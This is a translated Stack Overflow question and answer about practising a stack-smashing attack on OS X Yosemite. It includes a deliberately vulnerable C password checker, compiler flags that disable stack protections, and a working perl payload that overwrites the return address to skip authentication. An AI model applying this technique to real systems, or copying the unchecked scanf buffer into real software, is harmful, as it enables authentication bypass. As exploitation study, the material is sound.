堆栈粉碎OS X约塞米蒂?

时间:2016-04-21 08:16:19

标签: c gcc yosemite aslr stack-smash

我无法弄清楚如何在OS X 10.10.5(Yosemite)上禁用堆栈保护。我有点在网上拼凑各种线程的gcc标志,但到目前为止还没有设法禁用保护。我目前正在编写我的程序:

gcc -g3 -std=c99 -pedantic -Wall -m32 -fno-stack-protector -fno-sanitize=address -D_FORTIFY_SOURCE=0 -Wl,-no_pie -o program program.c

但是当我尝试粉碎堆栈时,我会发生段错误。

我在Red Hat Enterprise Linux Server 7.2(Maipo)上尝试过相同的程序,并在适当调整内存地址差异后,在编译之后没有问题粉碎堆栈:

gcc -g3 -std=c99 -pedantic -Wall -m32 -fno-stack-protector -o program program.c

也许值得注意的是,就像在大多数Mac上一样,我机器上的gcc是clang的符号链接(Apple LLVM版本7.0.0(clang-700.0.72))。

如何禁用Yosemite的堆叠保护?

其他详细信息

我正在使用的虚拟程序是:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int authenticate() {
  char password[10];
  printf("Enter password: ");
  scanf("%s", password);
  return strcmp(password, "1234567890") == 0;
}

void success() {
  printf("Access granted\n");
  exit(0);
}

void failure() {
  printf("Access denied\n");
  exit(1);
}

int main(int argc, char** argv) {
  if (authenticate()) {
    success();
  } else {
    failure();
  }
}

当我运行otool -tv program时,我会注意到以下内容:

我要跳转到的success例程位于地址0x00001e70

我们通常在authenticate之后返回的指令位于地址0x00001efe

在输入虚拟密码“xxxxxxxxxx”并使用gdb检查缓冲区后运行x/30xb &password时,我发现:

0xbffffc32: 0x78    0x78    0x78    0x78    0x78    0x78    0x78    0x78
0xbffffc3a: 0x78    0x78    0x00    0x00    0x00    0x00    0x00    0x00
0xbffffc42: 0x00    0x00    0xfc    0xfc    0xff    0xbf    0x68    0xfc
0xbffffc4a: 0xff    0xbf    0xfe    0x1e    0x00    0x00

我们希望将第27个0xfe字节覆盖为0x70

当我尝试按如下方式粉碎堆栈时:

printf "xxxxxxxxxxxxxxxxxxxxxxxxxx\x70" | ./program # 26 bytes of junk, followed by 0x70

我遇到了段错误。

1 个答案:

答案 0 :(得分:2)

OS X ABI要求从16字节对齐的堆栈发出系统调用(例如exit中的success)。当你跳入成功时,你得到4个字节,因为它没有另一个返回地址坐在堆栈上(即,你应该call函数)

对此的修复是跳转到更高堆栈帧中对success的调用。跳到主要作品中的那个:

(gdb) disas main
Dump of assembler code for function main:
   0x00001ed0 <+0>: push   %ebp
   0x00001ed1 <+1>: mov    %esp,%ebp
   0x00001ed3 <+3>: sub    $0x18,%esp
   0x00001ed6 <+6>: mov    0xc(%ebp),%eax
   0x00001ed9 <+9>: mov    0x8(%ebp),%ecx
   0x00001edc <+12>:   movl   $0x0,-0x4(%ebp)
   0x00001ee3 <+19>:   mov    %ecx,-0x8(%ebp)
   0x00001ee6 <+22>:   mov    %eax,-0xc(%ebp)
   0x00001ee9 <+25>:   call   0x1df0 <authenticate>
   0x00001eee <+30>:   cmp    $0x0,%eax
   0x00001ef1 <+33>:   je     0x1f01 <main+49>

   0x00001ef7 <+39>:   call   0x1e60 <success>

   0x00001efc <+44>:   jmp    0x1f06 <main+54>
   0x00001f01 <+49>:   call   0x1e90 <failure>
   0x00001f06 <+54>:   mov    -0x4(%ebp),%eax
   0x00001f09 <+57>:   add    $0x18,%esp
   0x00001f0c <+60>:   pop    %ebp
   0x00001f0d <+61>:   ret

然后返回call 0x1ef7指令:

$ perl -e 'print "P"x26, "\xf7\x1e"' | ./stack
Enter password: Root access has been granted
$
相关问题
最新问题